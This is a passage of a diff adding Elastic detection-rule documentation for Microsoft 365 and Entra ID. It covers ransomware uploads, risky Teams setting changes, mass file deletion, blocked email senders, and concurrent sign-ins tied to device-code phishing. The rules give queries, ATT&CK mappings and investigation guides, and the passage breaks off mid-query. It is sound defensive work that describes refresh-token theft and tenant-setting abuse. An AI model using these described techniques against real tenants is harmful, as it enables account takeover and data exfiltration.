recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Microsoft 365 Potential ransomware activity* + + +Microsoft 365's cloud services can be exploited by adversaries to distribute ransomware by uploading infected files. This detection rule leverages Microsoft Cloud App Security to identify suspicious uploads, focusing on successful events flagged as potential ransomware activity. By monitoring specific event datasets and actions, it helps security analysts pinpoint and mitigate ransomware threats, aligning with MITRE ATT&CK's impact tactics. + + +*Possible investigation steps* + + +- Review the event details in the Microsoft Cloud App Security console to confirm the specific files and user involved in the "Potential ransomware activity" alert. +- Check the event.dataset field for o365.audit logs to gather additional context about the user's recent activities and any other related events. +- Investigate the event.provider field to ensure the alert originated from the SecurityComplianceCenter, confirming the source of the detection. +- Analyze the event.category field to verify that the activity is categorized as web, which may indicate the method of file upload. +- Assess the user's recent activity history and permissions to determine if the upload was intentional or potentially malicious. +- Contact the user to verify the legitimacy of the uploaded files and gather any additional context or explanations for the activity. +- If the files are confirmed or suspected to be malicious, initiate a response plan to contain and remediate any potential ransomware threat, including isolating affected systems and notifying relevant stakeholders. + + +*False positive analysis* + + +- Legitimate file uploads by trusted users may trigger alerts if the files are mistakenly flagged as ransomware. To manage this, create exceptions for specific users or groups who frequently upload large volumes of files. +- Automated backup processes that upload encrypted files to the cloud can be misidentified as ransomware activity. Exclude these processes by identifying and whitelisting the associated service accounts or IP addresses. +- Certain file types or extensions commonly used in business operations might be flagged. Review and adjust the detection rule to exclude these file types if they are consistently identified as false positives. +- Collaborative tools that sync files across devices may cause multiple uploads that appear suspicious. Monitor and exclude these tools by recognizing their typical behavior patterns and adjusting the rule settings accordingly. +- Regularly review and update the list of exceptions to ensure that only verified non-threatening activities are excluded, maintaining the balance between security and operational efficiency. + + +*Response and remediation* + + +- Immediately isolate the affected user account to prevent further uploads and potential spread of ransomware within the cloud environment. +- Quarantine the uploaded files flagged as potential ransomware to prevent access and further distribution. +- Conduct a thorough scan of the affected user's devices and cloud storage for additional signs of ransomware or other malicious activity. +- Notify the security operations team to initiate a deeper investigation into the source and scope of the ransomware activity, leveraging MITRE ATT&CK techniques for guidance. +- Restore any affected files from secure backups, ensuring that the backups are clean and free from ransomware. +- Review and update access controls and permissions for the affected user and related accounts to minimize the risk of future incidents. +- Escalate the incident to senior security management and, if necessary, involve legal or compliance teams to assess any regulatory implications. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:"Potential ransomware activity" and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Encrypted for Impact +** ID: T1486 +** Reference URL: https://attack.mitre.org/techniques/T1486/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-teams-custom-application-interaction-allowed.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-teams-custom-application-interaction-allowed.asciidoc new file mode 100644 index 0000000000..3ef49c11fc --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-teams-custom-application-interaction-allowed.asciidoc @@ -0,0 +1,120 @@ +[[prebuilt-rule-8-19-8-microsoft-365-teams-custom-application-interaction-allowed]] +=== Microsoft 365 Teams Custom Application Interaction Allowed + +Identifies when custom applications are allowed in Microsoft Teams. If an organization requires applications other than those available in the Teams app store, custom applications can be developed as packages and uploaded. An adversary may abuse this behavior to establish persistence in an environment. + +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/microsoftteams/platform/concepts/deploy-and-publish/apps-upload + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Configuration Audit +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 211 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Microsoft 365 Teams Custom Application Interaction Allowed* + + +Microsoft Teams allows organizations to enhance functionality by integrating custom applications, which can be developed and uploaded beyond the standard app store offerings. While beneficial for tailored solutions, this capability can be exploited by adversaries to maintain unauthorized access. The detection rule monitors changes in tenant settings that permit custom app interactions, flagging successful modifications as potential persistence threats. + + +*Possible investigation steps* + + +- Review the audit logs for the specific event.action: TeamsTenantSettingChanged to identify when the change was made and by whom. +- Verify the identity of the user or account associated with the event to determine if the change was authorized or if the account may have been compromised. +- Check the o365.audit.Name field for "Allow sideloading and interaction of custom apps" to confirm that the alert corresponds to enabling custom app interactions. +- Investigate the o365.audit.NewValue field to ensure it is set to True, indicating that the setting was indeed changed to allow custom apps. +- Assess the event.outcome field to confirm the change was successful and not a failed attempt, which could indicate a different type of issue. +- Examine any recent custom applications uploaded to Microsoft Teams to ensure they are legitimate and not potentially malicious. +- Cross-reference with other security alerts or logs to identify any unusual activity around the time of the setting change that might suggest malicious intent. + + +*False positive analysis* + + +- Routine administrative changes to Microsoft Teams settings can trigger this rule. If a known and authorized administrator frequently updates tenant settings to allow custom apps, consider creating an exception for their user account to reduce noise. +- Organizations that regularly develop and deploy custom applications for internal use may see frequent alerts. In such cases, establish a process to document and approve these changes, and use this documentation to create exceptions for specific application deployment activities. +- Scheduled updates or maintenance activities that involve enabling custom app interactions might be misidentified as threats. Coordinate with IT teams to schedule these activities and temporarily adjust monitoring rules to prevent false positives during these periods. +- If a third-party service provider is authorized to manage Teams settings, their actions might trigger alerts. Verify their activities and, if consistent and legitimate, add their actions to an exception list to prevent unnecessary alerts. +- Changes made during a known testing or development phase can be mistaken for unauthorized access. Clearly define and communicate these phases to the security team, and consider temporary rule adjustments to accommodate expected changes. + + +*Response and remediation* + + +- Immediately disable the custom application interaction setting in Microsoft Teams to prevent further unauthorized access or persistence by adversaries. +- Conduct a thorough review of all custom applications currently uploaded to Microsoft Teams to identify any unauthorized or suspicious applications. Remove any that are not recognized or approved by the organization. +- Analyze the audit logs for any recent changes to the Teams settings and identify the user account responsible for enabling custom application interactions. Investigate the account for signs of compromise or misuse. +- Reset the credentials and enforce multi-factor authentication for the account(s) involved in the unauthorized change to prevent further unauthorized access. +- Notify the security team and relevant stakeholders about the incident and the actions taken. Escalate to higher management if the breach is suspected to have wider implications. +- Implement additional monitoring and alerting for changes to Microsoft Teams settings to quickly detect and respond to similar threats in the future. +- Review and update the organization's security policies and procedures regarding the use of custom applications in Microsoft Teams to ensure they align with best practices and mitigate the risk of similar incidents. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:MicrosoftTeams and +event.category:web and event.action:TeamsTenantSettingChanged and +o365.audit.Name:"Allow sideloading and interaction of custom apps" and +o365.audit.NewValue:True and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-teams-external-access-enabled.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-teams-external-access-enabled.asciidoc new file mode 100644 index 0000000000..4198bbf46e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-teams-external-access-enabled.asciidoc @@ -0,0 +1,118 @@ +[[prebuilt-rule-8-19-8-microsoft-365-teams-external-access-enabled]] +=== Microsoft 365 Teams External Access Enabled + +Identifies when external access is enabled in Microsoft Teams. External access lets Teams and Skype for Business users communicate with other users that are outside their organization. An adversary may enable external access or add an allowed domain to exfiltrate data or maintain persistence in an environment. + +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/microsoftteams/manage-external-access + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Configuration Audit +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Microsoft 365 Teams External Access Enabled* + + +Microsoft Teams' external access feature allows users to communicate with individuals outside their organization, facilitating collaboration. However, adversaries can exploit this by enabling external access or adding trusted domains to exfiltrate data or maintain persistence. The detection rule monitors audit logs for changes in federation settings, specifically when external access is successfully enabled, indicating potential misuse. + + +*Possible investigation steps* + + +- Review the audit logs for the specific event.action "Set-CsTenantFederationConfiguration" to identify when and by whom the external access was enabled. +- Examine the o365.audit.Parameters.AllowFederatedUsers field to confirm that it is set to True, indicating that external access was indeed enabled. +- Investigate the user account associated with the event to determine if the action was authorized and if the account has a history of suspicious activity. +- Check the event.provider field to see if the change was made through SkypeForBusiness or MicrosoftTeams, which may provide additional context on the method used. +- Assess the event.outcome field to ensure the action was successful and not a failed attempt, which could indicate a potential security threat. +- Look into any recent changes in the list of allowed domains to identify if any unauthorized or suspicious domains have been added. + + +*False positive analysis* + + +- Routine administrative changes to federation settings can trigger alerts. Regularly review and document these changes to differentiate between legitimate and suspicious activities. +- Organizations with frequent collaboration with external partners may see increased alerts. Consider creating exceptions for known trusted domains to reduce noise. +- Scheduled updates or policy changes by IT teams might enable external access temporarily. Coordinate with IT to log these activities and exclude them from triggering alerts. +- Automated scripts or tools used for configuration management can inadvertently enable external access. Ensure these tools are properly documented and monitored to prevent false positives. +- Changes made during mergers or acquisitions can appear suspicious. Maintain a record of such events and adjust monitoring rules accordingly to account for expected changes. + + +*Response and remediation* + + +- Immediately disable external access in Microsoft Teams to prevent further unauthorized communication with external domains. +- Review and remove any unauthorized or suspicious domains added to the allowed list in the Teams federation settings. +- Conduct a thorough audit of recent changes in the Teams configuration to identify any other unauthorized modifications or suspicious activities. +- Reset credentials and enforce multi-factor authentication for accounts involved in the configuration change to prevent further unauthorized access. +- Notify the security team and relevant stakeholders about the incident for awareness and further investigation. +- Escalate the incident to the incident response team if there is evidence of data exfiltration or if the scope of the breach is unclear. +- Implement enhanced monitoring and alerting for changes in Teams federation settings to detect similar threats in the future. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:(SkypeForBusiness or MicrosoftTeams) and +event.category:web and event.action:"Set-CsTenantFederationConfiguration" and +o365.audit.Parameters.AllowFederatedUsers:True and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-teams-guest-access-enabled.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-teams-guest-access-enabled.asciidoc new file mode 100644 index 0000000000..bd0fd44b57 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-teams-guest-access-enabled.asciidoc @@ -0,0 +1,117 @@ +[[prebuilt-rule-8-19-8-microsoft-365-teams-guest-access-enabled]] +=== Microsoft 365 Teams Guest Access Enabled + +Identifies when guest access is enabled in Microsoft Teams. Guest access in Teams allows people outside the organization to access teams and channels. An adversary may enable guest access to maintain persistence in an environment. + +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/powershell/module/skype/get-csteamsclientconfiguration?view=skype-ps + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Configuration Audit +* Tactic: Persistence +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Microsoft 365 Teams Guest Access Enabled* + + +Microsoft Teams allows organizations to collaborate with external users through guest access, facilitating communication and teamwork. However, adversaries can exploit this feature to gain persistent access to sensitive environments by enabling guest access without authorization. The detection rule monitors audit logs for specific configurations that indicate guest access has been enabled, helping identify unauthorized changes and potential security breaches. + + +*Possible investigation steps* + + +- Review the audit logs to confirm the event.action "Set-CsTeamsClientConfiguration" was successfully executed with the parameter o365.audit.Parameters.AllowGuestUser set to True. +- Identify the user account responsible for enabling guest access by examining the event logs for the user ID or account name associated with the action. +- Check the user's activity history to determine if there are any other suspicious actions or patterns, such as changes to other configurations or unusual login times. +- Investigate the context of the change by reviewing any related communications or requests that might justify enabling guest access, ensuring it aligns with organizational policies. +- Assess the potential impact by identifying which teams and channels now have guest access enabled and evaluate the sensitivity of the information accessible to external users. +- Contact the user or their manager to verify if the change was authorized and necessary, and document their response for future reference. + + +*False positive analysis* + + +- Legitimate collaboration with external partners may trigger alerts when guest access is enabled for business purposes. To manage this, create exceptions for known and approved external domains or specific projects that require guest access. +- Routine administrative actions by IT staff to enable guest access for specific teams or channels can be mistaken for unauthorized changes. Implement a process to log and approve such changes internally, and exclude these from triggering alerts. +- Automated scripts or third-party applications that configure Teams settings, including guest access, might cause false positives. Identify and whitelist these scripts or applications to prevent unnecessary alerts. +- Changes made during scheduled maintenance windows can be misinterpreted as unauthorized. Define and exclude these time periods from monitoring to reduce false positives. + + +*Response and remediation* + + +- Immediately disable guest access in Microsoft Teams by updating the Teams client configuration to prevent unauthorized external access. +- Conduct a thorough review of recent audit logs to identify any unauthorized changes or suspicious activities related to guest access settings. +- Notify the security team and relevant stakeholders about the potential breach to ensure awareness and initiate further investigation. +- Revoke any unauthorized guest accounts that have been added to Teams to eliminate potential persistence mechanisms. +- Implement additional monitoring on Teams configurations to detect any future unauthorized changes to guest access settings. +- Escalate the incident to the organization's incident response team for a comprehensive investigation and to determine if further containment actions are necessary. +- Review and update access control policies to ensure that enabling guest access requires appropriate authorization and oversight. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:(SkypeForBusiness or MicrosoftTeams) and +event.category:web and event.action:"Set-CsTeamsClientConfiguration" and +o365.audit.Parameters.AllowGuestUser:True and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-unusual-volume-of-file-deletion.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-unusual-volume-of-file-deletion.asciidoc new file mode 100644 index 0000000000..e28eadb91b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-unusual-volume-of-file-deletion.asciidoc @@ -0,0 +1,117 @@ +[[prebuilt-rule-8-19-8-microsoft-365-unusual-volume-of-file-deletion]] +=== Microsoft 365 Unusual Volume of File Deletion + +Identifies that a user has deleted an unusually large volume of files as reported by Microsoft Cloud App Security. + +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy +* https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Configuration Audit +* Tactic: Impact +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Microsoft 365 Unusual Volume of File Deletion* + + +Microsoft 365's cloud environment facilitates file storage and collaboration, but its vast data handling capabilities can be exploited by adversaries for data destruction. Attackers may delete large volumes of files to disrupt operations or cover their tracks. The detection rule leverages audit logs to identify anomalies in file deletion activities, flagging successful, unusual deletion volumes as potential security incidents, thus enabling timely investigation and response. + + +*Possible investigation steps* + + +- Review the audit logs for the specific user associated with the alert to confirm the volume and context of the file deletions, focusing on entries with event.action:"Unusual volume of file deletion" and event.outcome:success. +- Correlate the timestamps of the deletion events with other activities in the user's account to identify any suspicious patterns or anomalies, such as unusual login locations or times. +- Check for any recent changes in user permissions or roles that might explain the ability to delete a large volume of files, ensuring these align with the user's typical responsibilities. +- Investigate any recent security alerts or incidents involving the same user or related accounts to determine if this activity is part of a broader attack or compromise. +- Contact the user or their manager to verify if the deletions were intentional and authorized, and gather any additional context that might explain the activity. +- Assess the impact of the deletions on business operations and data integrity, and determine if any recovery actions are necessary to restore critical files. + + +*False positive analysis* + + +- High-volume legitimate deletions during data migration or cleanup projects can trigger false positives. To manage this, create exceptions for users or groups involved in these activities during the specified time frame. +- Automated processes or scripts that perform bulk deletions as part of routine maintenance may be flagged. Identify these processes and whitelist them to prevent unnecessary alerts. +- Users with roles in data management or IT support may regularly delete large volumes of files as part of their job responsibilities. Establish a baseline for these users and adjust the detection thresholds accordingly. +- Temporary spikes in file deletions due to organizational changes, such as department restructuring, can be mistaken for malicious activity. Monitor these events and temporarily adjust the rule parameters to accommodate expected changes. +- Regularly review and update the list of exceptions to ensure that only legitimate activities are excluded from alerts, maintaining the effectiveness of the detection rule. + + +*Response and remediation* + + +- Immediately isolate the affected user account to prevent further unauthorized file deletions. This can be done by disabling the account or changing the password. +- Review the audit logs to identify the scope of the deletion and determine if any critical or sensitive files were affected. Restore these files from backups if available. +- Conduct a thorough review of the affected user's recent activities to identify any other suspicious actions or potential indicators of compromise. +- Escalate the incident to the security operations team for further investigation and to determine if the deletion is part of a larger attack or breach. +- Implement additional monitoring on the affected account and similar high-risk accounts to detect any further unusual activities. +- Review and update access controls and permissions to ensure that users have the minimum necessary access to perform their job functions, reducing the risk of large-scale deletions. +- Coordinate with the IT and security teams to conduct a post-incident review, identifying any gaps in the response process and implementing improvements to prevent recurrence. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:"Unusual volume of file deletion" and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Destruction +** ID: T1485 +** Reference URL: https://attack.mitre.org/techniques/T1485/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-user-restricted-from-sending-email.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-user-restricted-from-sending-email.asciidoc new file mode 100644 index 0000000000..1c2e6c734a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-user-restricted-from-sending-email.asciidoc @@ -0,0 +1,112 @@ +[[prebuilt-rule-8-19-8-microsoft-365-user-restricted-from-sending-email]] +=== Microsoft 365 User Restricted from Sending Email + +Identifies when a user has been restricted from sending email due to exceeding sending limits of the service policies per the Security Compliance Center. + +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy +* https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Configuration Audit +* Tactic: Impact +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Microsoft 365 User Restricted from Sending Email* + + +Microsoft 365 enforces email sending limits to prevent abuse and ensure service integrity. Adversaries may exploit compromised accounts to send spam or phishing emails, triggering these limits. The detection rule monitors audit logs for successful restrictions by the Security Compliance Center, indicating potential misuse of valid accounts, aligning with MITRE ATT&CK's Initial Access tactic. + + +*Possible investigation steps* + + +- Review the audit logs in Microsoft 365 to confirm the event details, focusing on entries with event.dataset:o365.audit and event.provider:SecurityComplianceCenter to ensure the restriction was logged correctly. +- Identify the user account that was restricted by examining the event.action:"User restricted from sending email" and event.outcome:success fields to understand which account triggered the alert. +- Investigate the recent email activity of the restricted user account to determine if there was any unusual or suspicious behavior, such as a high volume of outbound emails or patterns consistent with spam or phishing. +- Check for any recent changes in account permissions or configurations that might indicate unauthorized access or compromise, aligning with the MITRE ATT&CK technique T1078 for Valid Accounts. +- Assess whether there are any other related alerts or incidents involving the same user or similar patterns, which could indicate a broader security issue or coordinated attack. + + +*False positive analysis* + + +- High-volume legitimate email campaigns by marketing or communication teams can trigger sending limits. Coordinate with these teams to understand their schedules and create exceptions for known campaigns. +- Automated systems or applications using Microsoft 365 accounts for sending notifications or alerts may exceed limits. Identify these accounts and consider using service accounts with appropriate permissions and limits. +- Users with delegated access to multiple mailboxes might inadvertently trigger restrictions. Review and adjust permissions or create exceptions for these users if their activity is verified as legitimate. +- Temporary spikes in email activity due to business needs, such as end-of-quarter communications, can cause false positives. Monitor these periods and adjust thresholds or create temporary exceptions as needed. +- Misconfigured email clients or scripts that repeatedly attempt to send emails can appear as suspicious activity. Ensure proper configuration and monitor for any unusual patterns that may need exceptions. + + +*Response and remediation* + + +- Immediately disable the compromised user account to prevent further unauthorized email activity and potential spread of phishing or spam. +- Conduct a password reset for the affected account and enforce multi-factor authentication (MFA) to enhance security and prevent future unauthorized access. +- Review the audit logs for any additional suspicious activities associated with the compromised account, such as unusual login locations or times, and investigate any anomalies. +- Notify the affected user and relevant stakeholders about the incident, providing guidance on recognizing phishing attempts and securing their accounts. +- Escalate the incident to the security operations team for further analysis and to determine if other accounts or systems have been compromised. +- Implement additional email filtering rules to block similar phishing or spam patterns identified in the incident to prevent recurrence. +- Update and enhance detection rules and monitoring to quickly identify and respond to similar threats in the future, leveraging insights from the current incident. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:"User restricted from sending email" and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-concurrent-sign-ins-with-suspicious-properties.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-concurrent-sign-ins-with-suspicious-properties.asciidoc new file mode 100644 index 0000000000..99a43d9e8a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-concurrent-sign-ins-with-suspicious-properties.asciidoc @@ -0,0 +1,180 @@ +[[prebuilt-rule-8-19-8-microsoft-entra-id-concurrent-sign-ins-with-suspicious-properties]] +=== Microsoft Entra ID Concurrent Sign-Ins with Suspicious Properties + +Identifies concurrent azure signin events for the same user and from multiple sources, and where one of the authentication event has some suspicious properties often associated to DeviceCode and OAuth phishing. Adversaries may steal Refresh Tokens (RTs) via phishing to bypass multi-factor authentication (MFA) and gain unauthorized access to Azure resources. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-60m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://learn.microsoft.com/en-us/entra/identity/ +* https://learn.microsoft.com/en-us/entra/identity/monitoring-health/concept-sign-ins +* https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-azure-monitor-sign-ins-log-schema +* https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/ + +*Tags*: + +* Domain: Cloud +* Domain: SaaS +* Data Source: Azure +* Data Source: Entra ID +* Data Source: Entra ID Sign-in +* Use Case: Identity and Access Audit +* Use Case: Threat Detection +* Tactic: Credential Access +* Resources: Investigation Guide + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Microsoft Entra ID Concurrent Sign-Ins with Suspicious Properties* + + + +*Possible investigation steps* + + +- Review the sign-in logs to assess the context and reputation of the source.ip address. +- Investigate the user account associated with the successful sign-in to determine if the activity aligns with expected behavior or if it appears suspicious. +- Check for any recent changes or anomalies in the user's account settings or permissions that could indicate compromise. +- Review the history of sign-ins for the user to identify any patterns or unusual access times that could suggest unauthorized access. +- Assess the device from which the sign-in was attempted to ensure it is a recognized and authorized device for the user. + + +*Response and remediation* + + +- Immediately revoke the compromised Primary Refresh Tokens (PRTs) to prevent further unauthorized access. This can be done through the Azure portal by navigating to the user's account and invalidating all active sessions. +- Enforce a password reset for the affected user accounts to ensure that any credentials potentially compromised during the attack are no longer valid. +- Implement additional Conditional Access policies that require device compliance checks and restrict access to trusted locations or devices only, to mitigate the risk of future PRT abuse. +- Conduct a thorough review of the affected accounts' recent activity logs to identify any unauthorized actions or data access that may have occurred during the compromise. +- Escalate the incident to the security operations team for further investigation and to determine if there are any broader implications or additional compromised accounts. +- Enhance monitoring by configuring alerts for unusual sign-in patterns or device code authentication attempts from unexpected locations or devices, to improve early detection of similar threats. +- Coordinate with the incident response team to perform a post-incident analysis and update the incident response plan with lessons learned from this event. + +==== Setup + + + +*Required Azure Entra Sign-In Logs* + +This rule requires the Azure logs integration be enabled and configured to collect all logs, including sign-in logs from Entra. In Entra, sign-in logs must be enabled and streaming to the Event Hub used for the Azure logs integration. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-azure.signinlogs-* metadata _id, _version, _index + +// Scheduled to run every hour, reviewing events from past hour +| where + @timestamp > now() - 1 hours + and event.dataset == "azure.signinlogs" + and source.ip is not null + and azure.signinlogs.identity is not null + and to_lower(event.outcome) == "success" + +// keep relevant raw fields +| keep + @timestamp, + azure.signinlogs.identity, + source.ip, + azure.signinlogs.properties.authentication_requirement, + azure.signinlogs.properties.app_id, + azure.signinlogs.properties.resource_display_name, + azure.signinlogs.properties.authentication_protocol, + azure.signinlogs.properties.app_display_name + +// case classifications for identity usage +| eval + Esql.azure_signinlogs_properties_authentication_device_code_case = case( + azure.signinlogs.properties.authentication_protocol == "deviceCode" + and azure.signinlogs.properties.authentication_requirement != "multiFactorAuthentication", + azure.signinlogs.identity, + null), + + Esql.azure_signinlogs_auth_visual_studio_case = case( + azure.signinlogs.properties.app_id == "aebc6443-996d-45c2-90f0-388ff96faa56" + and azure.signinlogs.properties.resource_display_name == "Microsoft Graph", + azure.signinlogs.identity, + null), + + Esql.azure_signinlogs_auth_other_case = case( + azure.signinlogs.properties.authentication_protocol != "deviceCode" + and azure.signinlogs.properties.app_id != "aebc6443-996d-45c2-90f0-388ff96faa56", 